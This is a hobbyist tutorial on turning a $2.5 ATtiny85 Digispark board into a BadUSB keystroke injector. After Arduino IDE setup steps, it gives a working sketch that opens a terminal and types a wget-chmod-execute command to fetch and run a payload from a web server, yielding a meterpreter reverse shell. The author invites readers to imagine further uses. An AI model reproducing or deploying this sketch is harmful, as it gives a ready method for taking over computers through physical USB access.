Creating a Cheap Rubber Ducky Aka Bad Usb With Attiny85
I live in a country where most of the cool gadgets don’t get shipped. Offensive Security doesn’t ship the certificates here, Hak5 doesn’t send their gadgets here, and the list goes on. I really wanted to work with USB Rubber Ducky from HAK5 when I learned how amazing it was. I sought one for myself but It wasn’t very long till I found that they do not ship it here or anywhere closer to me. Time passed and one day I came across an article that talked about a programmable USB called Digispark USB Development Board which uses Attiny85 based micro-controller and I knew exactly how this would come in handy. But there it was again, my country wasn’t in the list of Digistump’s list of countries where they ship their products.
About two weeks before writing this article, I was going through the products of a local online shopping website called Daraz.pk and It came as a big surprise that they had Attiny85 micro-controller being sold through one of the local stores. I quickly ordered a couple of them without any hesitation from this seller for only $2.5 which is insanely cheap! and HAK5’s Rubber Ducky costs $40 on their official website.
It took about a week for it to get here due to various issues but the wait was totally worth it.
Notice that this one does not have “Digispark” written anywhere. For a moment, I thought this would not work with Digispark’s libraries but I was wrong. Upon plugging it in, I saw that it was detected as a Digispark device and It was such a relief!
It was time to program it and that is what I did! You can use any Operating System to program it. However, you do need Arduino IDE for this to work. One thing to note here is that you need version Arduino IDE 1.8.5 which works very well and later versions simply don’t; not for me at least. I will be using Linux to do this but It’s similar on Windows & Mac. Once you download the IDE, you are presented with the following interface
Go to File > Preferences
Match the following settings
You need put this URL in the Additional Boards Manager URLs: “http://digistump.com/package_digistump_index.json” and click Okay.
Now go to Tools > Board: “Arduino/Genuino Uno” > Boards Manager
Click on Type and select “Contributed” and install the following Board Library
Now select the correct board by going to Tools > Board: “Arduino/Genuino Uno” > “Digispark (Default – 16.5 mhz)” And also select USBtinyISP by going to Tools > Programmer. It should say the following on the bottom of the IDE
Once that is done, Let’s test!
Go to Files > Examples > DigisparkKeyboard > Keyboard
Now Press “Ctrl + U” to upload the code to the Attiny85.
It’s gonna ask you to plug in your USB Attiny85. Plug it in and It is going to upload it to the USB
The code that we uploaded is a simple script which when we plug in the USB just waits for about 5 seconds and it starts printing “Hello Digispark!” in a continuous infinite loop.
Now, Let’s do something more interesting like creating a Reverse shell through this USB. I will simply create a meterpreter reverse shell payload through msfvenom for my local machine to test it.
I will use the following code to execute our shell on Linux Mint machine.
#include "DigiKeyboard.h"
void setup() {
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_T , MOD_CONTROL_LEFT | MOD_ALT_LEFT);
DigiKeyboard.delay(300);
DigiKeyboard.print("cd /tmp; wget http://127.0.0.1/test; chmod 777 test; ./test");
DigiKeyboard.delay(200);
DigiKeyboard.sendKeyStroke(KEY_ENTER);
DigiKeyboard.delay(1000);
}
void loop() {
}
What this code basically does is that when the USB is plugged, it waits for about 2 seconds and then opens up a terminal and then waits for 0.3 seconds and changes directory to /tmp and retrieves our payload locally(This is for test purposes) from our webserver and executes it.
And sure enough, we get a reverse shell when we plug in this USB. There are so many things that can be done through this USB. I will let your imagination figure that out!